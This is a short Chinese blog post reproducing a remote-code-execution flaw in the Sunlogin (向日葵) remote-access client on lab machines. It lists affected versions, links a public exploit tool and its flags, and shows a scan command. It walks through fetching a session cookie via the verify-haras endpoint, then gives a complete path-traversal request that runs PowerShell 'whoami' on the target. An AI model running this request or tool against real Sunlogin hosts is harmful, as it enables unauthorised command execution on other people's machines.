向日葵RCE复现

复现步骤

影响版本

向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

环境

向日葵客户端版本号:11.0.0.33

利用漏洞工具下载:
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

工具命令:
-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令

1.安装向日葵
2.使用工具探测

xrKRce.exe -h 192.168.116.128 -t scan

image
3. 测试未执行成功
image

4.手工漏洞探测:扫描端口,使用curl ip:[端口号] ,如下响应结果表示存在漏洞,没有回显表明漏洞不能被利用。
image

5.确认存在漏洞后,浏览器访问ip:端口号+cgi-bin/rpc?action=verify-haras,获取cookie值。
image

6.使用获取到的cookie修改请求包,利用特殊格式的发送执行命令,如'whoami',请求尝试看是否可以获取到主机名称,如果有回显则证明这个漏洞成功复现。

http://192.168.2.14:49163/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

image

posted @ 2022-11-10 10:46  清汤自打  阅读(40)  评论(0编辑  收藏  举报